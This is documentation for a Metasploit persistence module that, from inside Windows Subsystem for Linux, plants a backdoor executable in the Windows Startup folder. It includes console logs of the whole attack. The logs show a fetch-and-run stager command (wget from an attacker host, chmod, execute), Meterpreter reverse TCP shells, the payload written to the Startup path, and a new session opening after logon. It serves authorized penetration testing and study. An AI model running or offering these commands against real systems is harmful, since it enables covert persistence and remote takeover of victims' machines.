## Vulnerable Application This module establishes persistence by creating a payload in the windows startup folder from within the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login. Verified on Windows 10 with Ubuntu 24.04 WSL distribution. ## Verification Steps 1. Get a shell on WSL (wsl could be started in a user or admin context) 2. `use exploit/linux/persistence/wsl/startup_folder` 3. `set SESSION ` 4. `exploit` ## Options ### PAYLOAD_NAME Name of backdoor executable. Defaults to a random name ### CONTEXT Target each User or All Users (system). Defaults to `USER`. Choices are `USER`, `SYSTEM`. ### USER Only required when `CONTEXT` is set to `USER`. The user to exploit, or `ALL` for all of them. Defaults to `ALL`. ## Scenarios ### Tested on Windows 10 with Ubuntu 22.04 WSL Initial access into WSL ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set srvport 8082 srvport => 8082 resource (/root/.msf4/msfconsole.rc)> set uripath l uripath => l resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4446 lport => 4446 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Starting persistent handler(s)... [*] Started reverse TCP handler on 1.1.1.1:4446 [*] Using URL: http://1.1.1.1:8082/l [*] Server started. [*] Run the following command on the target machine: wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown msf exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500 msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : win10prolicensed.localdomain OS : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > getuid Server username: windows meterpreter > background [*] Backgrounding session 1... ``` Install persistence ``` msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(linux/persistence/wsl/startup_folder) > set session 1 session => 1 msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(linux/persistence/wsl/startup_folder) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(linux/persistence/wsl/startup_folder) > [!] SESSION may not be compatible with this module: [!] * incompatible session platform: linux. This module works with: Windows. [*] Running automatic check ("set AutoCheck false" to disable) [+] Inside WSL environment [+] The target appears to be vulnerable. Likely exploitable [+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc ``` Logout and back in to windows ``` [*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died msf exploit(linux/persistence/wsl/startup_folder) > [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500 msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > background ```